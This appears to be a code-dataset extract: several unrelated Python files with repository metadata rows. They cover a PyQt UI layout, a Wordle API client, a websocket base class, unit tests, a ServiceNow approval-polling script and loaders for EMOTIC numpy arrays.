self.SceneWidget = QtWidgets.QWidget(self.centralwidget)
self.SceneWidget.setObjectName("SceneWidget")
self.gridLayout = QtWidgets.QGridLayout(self.SceneWidget)
self.gridLayout.setSpacing(2)
self.gridLayout.setContentsMargins(1, 1, 1, 1)
self.gridLayout.setObjectName("gridLayout")
self.widgetCurrentGraphPath = QtWidgets.QWidget(self.SceneWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widgetCurrentGraphPath.sizePolicy().hasHeightForWidth())
self.widgetCurrentGraphPath.setSizePolicy(sizePolicy)
self.widgetCurrentGraphPath.setObjectName("widgetCurrentGraphPath")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widgetCurrentGraphPath)
self.horizontalLayout_3.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.layoutGraphPath = QtWidgets.QHBoxLayout()
self.layoutGraphPath.setSpacing(2)
self.layoutGraphPath.setContentsMargins(-1, 0, -1, 0)
self.layoutGraphPath.setObjectName("layoutGraphPath")
self.horizontalLayout_3.addLayout(self.layoutGraphPath)
self.gridLayout.addWidget(self.widgetCurrentGraphPath, 1, 0, 1, 1)
self.SceneLayout = QtWidgets.QGridLayout()
self.SceneLayout.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.SceneLayout.setObjectName("SceneLayout")
self.gridLayout.addLayout(self.SceneLayout, 4, 0, 1, 1)
self.CompoundPropertiesWidget = QtWidgets.QWidget(self.SceneWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.CompoundPropertiesWidget.sizePolicy().hasHeightForWidth())
self.CompoundPropertiesWidget.setSizePolicy(sizePolicy)
self.CompoundPropertiesWidget.setObjectName("CompoundPropertiesWidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.CompoundPropertiesWidget)
self.gridLayout_2.setContentsMargins(0, 0, 0, 0)
self.gridLayout_2.setObjectName("gridLayout_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setContentsMargins(-1, 0, -1, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_2 = QtWidgets.QLabel(self.CompoundPropertiesWidget)
self.label_2.setObjectName("label_2")
self.horizontalLayout_2.addWidget(self.label_2)
self.leCompoundName = QtWidgets.QLineEdit(self.CompoundPropertiesWidget)
self.leCompoundName.setObjectName("leCompoundName")
self.horizontalLayout_2.addWidget(self.leCompoundName)
self.label = QtWidgets.QLabel(self.CompoundPropertiesWidget)
self.label.setObjectName("label")
self.horizontalLayout_2.addWidget(self.label)
self.leCompoundCategory = QtWidgets.QLineEdit(self.CompoundPropertiesWidget)
self.leCompoundCategory.setObjectName("leCompoundCategory")
self.horizontalLayout_2.addWidget(self.leCompoundCategory)
self.gridLayout_2.addLayout(self.horizontalLayout_2, 0, 0, 1, 1)
self.gridLayout.addWidget(self.CompoundPropertiesWidget, 2, 0, 1, 1)
self.gridLayout_3.addWidget(self.SceneWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menuBar = QtWidgets.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 863, 26))
self.menuBar.setObjectName("menuBar")
MainWindow.setMenuBar(self.menuBar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.dockWidgetNodeView = QtWidgets.QDockWidget(MainWindow)
self.dockWidgetNodeView.setMinimumSize(QtCore.QSize(200, 113))
self.dockWidgetNodeView.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea|QtCore.Qt.LeftDockWidgetArea|QtCore.Qt.RightDockWidgetArea)
self.dockWidgetNodeView.setObjectName("dockWidgetNodeView")
self.dockWidgetContents = QtWidgets.QWidget()
self.dockWidgetContents.setObjectName("dockWidgetContents")
self.verticalLayout = QtWidgets.QVBoxLayout(self.dockWidgetContents)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.scrollArea = QtWidgets.QScrollArea(self.dockWidgetContents)
self.scrollArea.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 198, 475))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout_5.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.propertiesLayout = QtWidgets.QVBoxLayout()
self.propertiesLayout.setObjectName("propertiesLayout")
self.verticalLayout_5.addLayout(self.propertiesLayout)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_5.addItem(spacerItem)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.verticalLayout.addWidget(self.scrollArea)
self.dockWidgetNodeView.setWidget(self.dockWidgetContents)
MainWindow.addDockWidget(QtCore.Qt.DockWidgetArea(1), self.dockWidgetNodeView)
self.toolBar.addSeparator()
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtCompat.translate("MainWindow", "PyFlow", None, -1))
self.label_2.setText(QtCompat.translate("MainWindow", "Name:", None, -1))
self.label.setText(QtCompat.translate("MainWindow", "Category:", None, -1))
self.toolBar.setWindowTitle(QtCompat.translate("MainWindow", "toolBar", None, -1))
self.dockWidgetNodeView.setWindowTitle(QtCompat.translate("MainWindow", "PropertyView", None, -1))
| 60.648855 | 148 | 0.746633 | 739 | 7,945 | 7.975643 | 0.223275 | 0.005429 | 0.004072 | 0.010859 | 0.201222 | 0.158466 | 0.109942 | 0.084153 | 0.084153 | 0.07058 | 0 | 0.022153 | 0.15343 | 7,945 | 130 | 149 | 61.115385 | 0.854148 | 0.042039 | 0 | 0.051724 | 1 | 0 | 0.057756 | 0.009209 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017241 | false | 0 | 0.008621 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1db11b3357bbf28fcc5549063a419c83717d2922 | 995 | py | Python | computer_wordle.py | AntonKueltz/computer-wordle-client | 5cd88d779f529de2c19b82d599ff478476cb0feb | [
"MIT"
] | null | null | null | computer_wordle.py | AntonKueltz/computer-wordle-client | 5cd88d779f529de2c19b82d599ff478476cb0feb | [
"MIT"
] | null | null | null | computer_wordle.py | AntonKueltz/computer-wordle-client | 5cd88d779f529de2c19b82d599ff478476cb0feb | [
"MIT"
] | 2 | 2022-02-03T01:36:51.000Z | 2022-02-07T20:52:36.000Z | #!/usr/bin/env python3
import api
from urllib.parse import urljoin
GREEN = 'G'
YELLOW = 'Y'
GRAY = '.'
with open('wordlist.txt') as wordlist_file:
wordlist = tuple(line.strip() for line in wordlist_file)
class Game:
def __init__(self):
response = api.start_new_game()
self._game_id = response['game_id']
self._public_game_id = response['public_game_id']
self._current_hint = response['hint']
def current_hint(self):
return self._current_hint
def guess(self, guess):
response = api.make_guess(self._game_id, guess)
return_value = {'guess_response': response['response']}
if 'next_hint' in response:
self._current_hint = response['next_hint']
return_value['next_hint'] = response['next_hint']
return return_value
def status(self):
return api.get_game_status(self._game_id)
def url(self):
return urljoin(api.BASE_URL, f'/game/{self._public_game_id}/')
| 26.184211 | 70 | 0.654271 | 133 | 995 | 4.578947 | 0.368421 | 0.068966 | 0.049261 | 0.052545 | 0.085386 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0013 | 0.227136 | 995 | 37 | 71 | 26.891892 | 0.790637 | 0.021106 | 0 | 0 | 0 | 0 | 0.130524 | 0.029805 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.076923 | 0.115385 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
1db591283c587148c660788ee47bee65cf843d14 | 693 | py | Python | src/tact/server/websocket.py | wabain/tact | bd95608bebc640e47f31f6d0a403108fe998188d | [
"MIT"
] | null | null | null | src/tact/server/websocket.py | wabain/tact | bd95608bebc640e47f31f6d0a403108fe998188d | [
"MIT"
] | null | null | null | src/tact/server/websocket.py | wabain/tact | bd95608bebc640e47f31f6d0a403108fe998188d | [
"MIT"
] | null | null | null | """Base definitions for the websocket interface"""
import json
from abc import ABC, abstractmethod
class WebsocketConnectionLost(Exception):
pass
class AbstractWSManager(ABC):
@abstractmethod
async def send(self, conn_id: str, msg: dict) -> None:
# This is implemented as a separate method primarily for test
# convenience
serialized = json.dumps(msg, separators=(',', ':'))
await self._send_serialized(conn_id, serialized)
@abstractmethod
async def _send_serialized(self, conn_id: str, msg: str) -> None:
raise NotImplementedError
@abstractmethod
async def close(self, conn_id: str):
raise NotImplementedError
| 27.72 | 69 | 0.695527 | 78 | 693 | 6.076923 | 0.551282 | 0.050633 | 0.139241 | 0.082278 | 0.067511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217893 | 693 | 24 | 70 | 28.875 | 0.874539 | 0.168831 | 0 | 0.333333 | 0 | 0 | 0.003515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.133333 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1dca8369ce474af0f5d87fe2a557846435779fc6 | 1,956 | py | Python | tests/test_reader.py | goiosunsw/audacity.py | 899fa99e11e0345f95a563ea3c72b0d98f84e646 | [
"MIT"
] | 1 | 2018-01-05T02:06:04.000Z | 2018-01-05T02:06:04.000Z | tests/test_reader.py | goiosunsw/audacity.py | 899fa99e11e0345f95a563ea3c72b0d98f84e646 | [
"MIT"
] | null | null | null | tests/test_reader.py | goiosunsw/audacity.py | 899fa99e11e0345f95a563ea3c72b0d98f84e646 | [
"MIT"
] | null | null | null | import unittest
import os
import sys
import argparse
import numpy as np
import audacity as aud
print('Module file:')
print(aud.__file__)
SCRIPT_DIR = os.path.split(os.path.realpath(__file__))[0]
PACKAGE_DIR = os.path.realpath(os.path.join(SCRIPT_DIR,'..'))
DATA_DIR = os.path.join(PACKAGE_DIR, 'data')
TEST_FILE_1 = os.path.join(DATA_DIR, 'test-1.aup')
class testReader(unittest.TestCase):
TEST_FILE = TEST_FILE_1
def test_read_data_is_2d(self):
filename = self.TEST_FILE
print('Audio file:')
print(filename)
au = aud.Aup(filename)
data = au.get_data()
assert len(data.shape) == 2
def test_read_channels_have_same_length(self):
filename = self.TEST_FILE
au = aud.Aup(filename)
data = au.get_data()
for ii in range(au.nchannels-1):
assert len(data[ii]) == len(data[ii+1])
def test_nsample_getter_same_as_data(self):
filename = self.TEST_FILE
au = aud.Aup(filename)
lens = au.get_channel_nsamples()
for ii, ll in enumerate(lens):
self.assertEqual(len(au.get_channel_data(ii)), ll)
def test_single_file_len_is_right(self):
filename = self.TEST_FILE
au = aud.Aup(filename)
chno = 0
au.open(chno)
for f, data in zip(au.files[chno], au.read()):
self.assertEqual(f[2]-f[1], len(data)/4)
def main():
global test_file
parser = argparse.ArgumentParser()
parser.add_argument('--input', default='')
parser.add_argument('unittest_args', nargs='*')
args = parser.parse_args()
# TODO: Go do something with args.input and args.filename
# Now set the sys.argv to the unittest_args (leaving sys.argv[0] alone)
sys.argv[1:] = args.unittest_args
if args.input:
print('Changing audio file to '+args.input)
testReader.TEST_FILE = args.input
unittest.main()
if __name__ == '__main__':
main()
| 26.432432 | 75 | 0.644683 | 284 | 1,956 | 4.214789 | 0.327465 | 0.06015 | 0.053467 | 0.066834 | 0.155388 | 0.135338 | 0.135338 | 0.135338 | 0.100251 | 0 | 0 | 0.009315 | 0.231595 | 1,956 | 73 | 76 | 26.794521 | 0.787092 | 0.063906 | 0 | 0.188679 | 0 | 0 | 0.049781 | 0 | 0 | 0 | 0 | 0.013699 | 0.075472 | 1 | 0.09434 | false | 0 | 0.113208 | 0 | 0.245283 | 0.09434 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1dcbbd2677c54b75d412f37ba6ff6de126f5a9fa | 248 | py | Python | tests/test_lightcurve.py | moemyself3/lightcurator | 0848435a170fea1d8979a416068ad88f7d8012a2 | [
"MIT"
] | 2 | 2019-03-20T15:11:22.000Z | 2020-05-31T01:55:03.000Z | tests/test_lightcurve.py | moemyself3/lightcurator | 0848435a170fea1d8979a416068ad88f7d8012a2 | [
"MIT"
] | 18 | 2019-03-20T06:42:17.000Z | 2021-01-24T04:57:08.000Z | tests/test_lightcurve.py | moemyself3/lightcurator | 0848435a170fea1d8979a416068ad88f7d8012a2 | [
"MIT"
] | null | null | null | import unittest
from lightcurator import lightcurve as lc
class TestLightcuratorMethods(unittest.TestCase):
def test_matchcat(self):
cc = lc.matchcat(23)
self.assertEqual(cc, 1)
if __name__ == '__main__':
unittest.main()
| 20.666667 | 49 | 0.709677 | 29 | 248 | 5.758621 | 0.724138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015075 | 0.197581 | 248 | 11 | 50 | 22.545455 | 0.824121 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1dd06073161d1a6fc8153bce35244468454bcf1e | 3,173 | py | Python | lab_2/find_lcs_length_optimized_test.py | alenashuvar/2020-2-level-labs | aa5185fae19b386c741faa8dcff3424872642090 | [
"MIT"
] | 3 | 2020-09-05T16:27:19.000Z | 2021-03-12T12:08:00.000Z | lab_2/find_lcs_length_optimized_test.py | alenashuvar/2020-2-level-labs | aa5185fae19b386c741faa8dcff3424872642090 | [
"MIT"
] | 100 | 2020-09-06T16:36:23.000Z | 2020-12-12T06:18:47.000Z | lab_2/find_lcs_length_optimized_test.py | alenashuvar/2020-2-level-labs | aa5185fae19b386c741faa8dcff3424872642090 | [
"MIT"
] | 62 | 2020-09-06T10:49:43.000Z | 2021-09-10T07:07:53.000Z | """
Tests find_lcs_optimized function
"""
import timeit
import unittest
from memory_profiler import memory_usage
from lab_2.main import find_lcs_length_optimized, tokenize_big_file
class FindLcsOptimizedTest(unittest.TestCase):
"""
Checks for find_lcs_optimized function
"""
def test_find_lcs_length_optimized_ideal_case(self):
"""
Tests that find_lcs_length_optimized
works just fine and not fails with big text
"""
sentence_tokens_first_text = tokenize_big_file('lab_2/data.txt')[:30000]
sentence_tokens_second_text = tokenize_big_file('lab_2/data_2.txt')[:30000]
plagiarism_threshold = 0.0001
actual = find_lcs_length_optimized(sentence_tokens_first_text,
sentence_tokens_second_text,
plagiarism_threshold)
reference_lcs = 3899
almost_equal = 3910
print(f"Actual find_lcs_length_optimized function lcs is {actual}")
print(f"Reference find_lcs_length_optimized function lcs is {reference_lcs}")
self.assertTrue(actual)
self.assertEqual(almost_equal, actual)
def test_find_lcs_length_optimized_quickest_time(self):
"""
Tests that find_lcs_length_optimized
works faster than time reference
"""
reference = 353.6632048700001 * 1.1
sentence_tokens_first_text = tokenize_big_file('lab_2/data.txt')[:30000]
sentence_tokens_second_text = tokenize_big_file('lab_2/data_2.txt')[:30000]
plagiarism_threshold = 0.0001
start_time = timeit.default_timer()
find_lcs_length_optimized(sentence_tokens_first_text,
sentence_tokens_second_text,
plagiarism_threshold)
end_time = timeit.default_timer()
actual = end_time - start_time
print(f"Actual find_lcs_length_optimized function running time is: {actual}")
print(f"Reference find_lcs_length_optimized function running time is: {reference}")
self.assertGreater(reference, actual)
def test_find_lcs_length_optimized_lowest_memory(self):
"""
Tests that find_lcs_length_optimized
works efficiently than given memory reference
"""
reference = 65.69129527698863 * 1.1
sentence_tokens_first_text = tokenize_big_file('lab_2/data.txt')[:30000]
sentence_tokens_second_text = tokenize_big_file('lab_2/data_2.txt')[:30000]
plagiarism_threshold = 0.0001
actual_memory = memory_usage((find_lcs_length_optimized,
(sentence_tokens_first_text,
sentence_tokens_second_text,
plagiarism_threshold)),
interval=2)
actual = sum(actual_memory)/len(actual_memory)
print(f'Actual find_lcs_length_optimized function memory consuming is: {actual}')
print(f'Reference find_lcs_length_optimized function memory consuming is: {reference}')
self.assertGreater(reference, actual)
| 42.306667 | 95 | 0.656792 | 363 | 3,173 | 5.347107 | 0.225895 | 0.064915 | 0.107161 | 0.18135 | 0.683153 | 0.683153 | 0.629057 | 0.588872 | 0.433282 | 0.433282 | 0 | 0.043535 | 0.276079 | 3,173 | 74 | 96 | 42.878378 | 0.80148 | 0.100536 | 0 | 0.347826 | 0 | 0 | 0.183346 | 0.054785 | 0 | 0 | 0 | 0 | 0.086957 | 1 | 0.065217 | false | 0 | 0.086957 | 0 | 0.173913 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1dd87ba8ad5a67a4277d8da50db47d17748918d9 | 2,208 | py | Python | pravash/servicenowplugin/xlr-servicenow-plugin-master/src/main/resources/servicenow/RequestApproval.py | amvasudeva/rapidata | 7b6e984d24866f5cf474847cf462ac628427cf48 | [
"Apache-2.0"
] | null | null | null | pravash/servicenowplugin/xlr-servicenow-plugin-master/src/main/resources/servicenow/RequestApproval.py | amvasudeva/rapidata | 7b6e984d24866f5cf474847cf462ac628427cf48 | [
"Apache-2.0"
] | 7 | 2020-06-30T23:14:35.000Z | 2021-08-02T17:08:05.000Z | pravash/servicenowplugin/xlr-servicenow-plugin-master/src/main/resources/servicenow/RequestApproval.py | amvasudeva/rapidata | 7b6e984d24866f5cf474847cf462ac628427cf48 | [
"Apache-2.0"
] | null | null | null | #
# THIS CODE AND INFORMATION ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS
# FOR A PARTICULAR PURPOSE. THIS CODE AND INFORMATION ARE NOT SUPPORTED BY XEBIALABS.
#
import sys, string, time
import com.xhaus.jyson.JysonCodec as json
from servicenow.ServiceNowClient import ServiceNowClient
if servicenowServer is None:
print "No server provided."
sys.exit(1)
if tableName is None:
print "No tableName provided."
sys.exit(1)
if content is None:
print "No content provided."
sys.exit(1)
if shortDescription is None:
print "No shortDescription provided."
sys.exit(1)
if description is None:
print "No description provided."
sys.exit(1)
snClient = ServiceNowClient.create_client(servicenowServer, username, password)
contentJSON = content % (shortDescription, description)
sysId = None
content = content % (shortDescription, description)
print "Sending content %s" % content
try:
data = snClient.create_record( tableName, content )
print "Returned DATA = %s" % (data)
print json.dumps(data, indent=4, sort_keys=True)
sysId = data["sys_id"]
Ticket = data["number"]
print "Created %s in Service Now." % (sysId)
print "Created %s in Service Now." % (Ticket)
except Exception, e:
exc_info = sys.exc_info()
traceback.print_exception( *exc_info )
print e
print snClient.print_error( e )
print "Failed to create record in Service Now"
sys.exit(1)
isClear = False
while ( not isClear ):
try:
data = snClient.get_change_request(tableName, sysId)
status = data["approval"]
print "Found %s in Service Now as %s" % (data['number'], status)
if "approved" == status:
approval = False
isClear = True
print "ServiceNow approval received."
ticket = data["number"]
elif "rejected" == status:
print "Failed to get approval from ServiceNow"
sys.exit(1)
else:
time.sleep(5)
except:
print json.dumps(data, indent=4, sort_keys=True)
print "Error finding status for %s" % statusField
# End try
# End While
| 27.6 | 98 | 0.688859 | 288 | 2,208 | 5.239583 | 0.381944 | 0.032472 | 0.037111 | 0.043075 | 0.163022 | 0.082174 | 0.049039 | 0.049039 | 0.049039 | 0 | 0 | 0.00579 | 0.217844 | 2,208 | 79 | 99 | 27.949367 | 0.867979 | 0.132699 | 0 | 0.192982 | 0 | 0 | 0.215522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.017544 | 0.052632 | null | null | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ddcb5a365134a0fc6fdd220c36768b3059a205b | 363 | py | Python | rotor_tm_traj/traj/Optimization/entire_path/generate_poly.py | xl2623/RotorTM | 4ef88f1fdb2137ff7f6e7f0acbf9105b99773ed8 | [
"BSD-3-Clause"
] | 1 | 2022-01-10T13:43:11.000Z | 2022-01-10T13:43:11.000Z | rotor_tm_traj/traj/Optimization/entire_path/generate_poly.py | xl2623/RotorTM | 4ef88f1fdb2137ff7f6e7f0acbf9105b99773ed8 | [
"BSD-3-Clause"
] | null | null | null | rotor_tm_traj/traj/Optimization/entire_path/generate_poly.py | xl2623/RotorTM | 4ef88f1fdb2137ff7f6e7f0acbf9105b99773ed8 | [
"BSD-3-Clause"
] | 3 | 2022-01-21T03:04:38.000Z | 2022-01-25T15:05:31.000Z | #! /usr/bin/env python
from math import factorial
import numpy as np
# test passed
def generate_poly(max_exponent,max_diff,symbol):
f=np.zeros((max_diff+1, max_exponent+1), dtype=float)
for k in range(max_diff+1):
for i in range(max_exponent+1):
if (i - k) >= 0:
f[k,i] = factorial(i)*symbol**(i-k)/factorial(i-k)
else:
f[k,i] = 0
return f | 24.2 | 55 | 0.663912 | 69 | 363 | 3.391304 | 0.492754 | 0.141026 | 0.068376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020134 | 0.179063 | 363 | 15 | 56 | 24.2 | 0.765101 | 0.090909 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1de5367a1f3c604d3f330ae4e673bd72ff6587fa | 7,651 | py | Python | preprocessing/emotic/load_data_from_numpy.py | GKalliatakis/DisplaceNet | 439bcd5ed4133b040baa107c215170eb963aa343 | [
"MIT"
] | 7 | 2019-05-13T01:49:43.000Z | 2020-02-19T04:16:35.000Z | preprocessing/emotic/load_data_from_numpy.py | GKalliatakis/DisplaceNet | 439bcd5ed4133b040baa107c215170eb963aa343 | [
"MIT"
] | null | null | null | preprocessing/emotic/load_data_from_numpy.py | GKalliatakis/DisplaceNet | 439bcd5ed4133b040baa107c215170eb963aa343 | [
"MIT"
] | 4 | 2019-05-28T16:06:31.000Z | 2020-02-27T09:29:16.000Z | """Python utilities required to load data (image & their annotations) stored in numpy arrays.
Functions `load_numpy_arrays_single_output` & `load_numpy_arrays_emotions_age_only` are deprecated.
Use either the main function `load_data_from_numpy` to load all the applicable arrays
or the supporting `load_annotations_only_from_numpy` instead.
"""
from __future__ import print_function
import numpy as np
def load_data_from_numpy(main_numpy_dir,
verbose = 1):
print ('[INFO] Loading data from numpy arrays...')
x_entire_train = np.load(main_numpy_dir + 'X_train/x_entire_train.npy')
x_cropped_train = np.load(main_numpy_dir + 'X_train/x_cropped_train.npy')
valence_entire_train = np.load(main_numpy_dir + 'Y_train/valence_train.npy')
valence_cropped_train = np.load(main_numpy_dir + 'Y_train/valence_train.npy')
arousal_entire_train = np.load(main_numpy_dir + 'Y_train/arousal_train.npy')
arousal_cropped_train = np.load(main_numpy_dir + 'Y_train/arousal_train.npy')
dominance_entire_train = np.load(main_numpy_dir + 'Y_train/dominance_train.npy')
dominance_cropped_train = np.load(main_numpy_dir + 'Y_train/dominance_train.npy')
x_entire_val = np.load(main_numpy_dir + 'X_train/x_entire_val.npy')
x_cropped_val = np.load(main_numpy_dir + 'X_train/x_cropped_val.npy')
valence_entire_val = np.load(main_numpy_dir + 'Y_train/valence_val.npy')
valence_cropped_val = np.load(main_numpy_dir + 'Y_train/valence_val.npy')
arousal_entire_val = np.load(main_numpy_dir + 'Y_train/arousal_val.npy')
arousal_cropped_val = np.load(main_numpy_dir + 'Y_train/arousal_val.npy')
dominance_entire_val = np.load(main_numpy_dir + 'Y_train/dominance_val.npy')
dominance_cropped_val = np.load(main_numpy_dir + 'Y_train/dominance_val.npy')
x_entire_test = np.load(main_numpy_dir + 'X_train/x_entire_test.npy')
x_cropped_test = np.load(main_numpy_dir + 'X_train/x_cropped_test.npy')
valence_entire_test = np.load(main_numpy_dir + 'Y_train/valence_test.npy')
valence_cropped_test = np.load(main_numpy_dir + 'Y_train/valence_test.npy')
arousal_entire_test = np.load(main_numpy_dir + 'Y_train/arousal_test.npy')
arousal_cropped_test = np.load(main_numpy_dir + 'Y_train/arousal_test.npy')
dominance_entire_test = np.load(main_numpy_dir + 'Y_train/dominance_test.npy')
dominance_cropped_test = np.load(main_numpy_dir + 'Y_train/dominance_test.npy')
print('[INFO] Data have been successfully loaded')
print('---------------------------------------------------------------------------------------------------')
if verbose == 1:
print('x_entire_train shape:', x_entire_train.shape)
print('x_cropped_train shape:', x_cropped_train.shape)
print('valence_entire_train shape:', valence_entire_train.shape)
print('valence_cropped_train shape:', valence_cropped_train.shape)
print('arousal_entire_train shape:', arousal_entire_train.shape)
print('arousal_cropped_train shape:', arousal_cropped_train.shape)
print('dominance_entire_train shape:', dominance_entire_train.shape)
print('dominance_cropped_train shape:', dominance_cropped_train.shape)
print ('---------------------------------------------------------------------------------------------------')
print('x_entire_val shape:', x_entire_val.shape)
print('x_cropped_val shape:', x_cropped_val.shape)
print('valence_entire_val shape:', valence_entire_val.shape)
print('valence_cropped_val shape:', valence_cropped_val.shape)
print('arousal_entire_val shape:', arousal_entire_val.shape)
print('arousal_cropped_val shape:', arousal_cropped_val.shape)
print('dominance_entire_val shape:', dominance_entire_val.shape)
print('dominance_cropped_val shape:', dominance_cropped_val.shape)
print ('---------------------------------------------------------------------------------------------------')
print('x_entire_test shape:', x_entire_test.shape)
print('x_cropped_test shape:', x_cropped_test.shape)
print('valence_entire_test shape:', valence_entire_test.shape)
print('valence_cropped_test shape:', valence_cropped_test.shape)
print('arousal_entire_test shape:', arousal_entire_test.shape)
print('arousal_cropped_test shape:', arousal_cropped_test.shape)
print('dominance_entire_test shape:', dominance_entire_test.shape)
print('dominance_cropped_test shape:', dominance_cropped_test.shape)
print ('---------------------------------------------------------------------------------------------------')
return (x_entire_train, x_cropped_train,valence_entire_train,valence_cropped_train,arousal_entire_train,arousal_cropped_train,dominance_entire_train,dominance_cropped_train), \
(x_entire_val, x_cropped_val, valence_entire_val,valence_cropped_val,arousal_entire_val,arousal_cropped_val,dominance_entire_val,dominance_cropped_val), \
(x_entire_test, x_cropped_test, valence_entire_test,valence_cropped_test,arousal_entire_test,arousal_cropped_test,dominance_entire_test,dominance_cropped_test)
def load_data_from_numpy_single_output(main_numpy_dir,
verbose=1):
print ('[INFO] Loading data from numpy arrays...')
x_image_train = np.load(main_numpy_dir + 'X_train/x_image_train.npy')
x_body_train = np.load(main_numpy_dir + 'X_train/x_body_train.npy')
y_image_train = np.load(main_numpy_dir + 'Y_train/y_train.npy')
y_body_train = np.load(main_numpy_dir + 'Y_train/y_train.npy')
x_image_val = np.load(main_numpy_dir + 'X_train/x_image_val.npy')
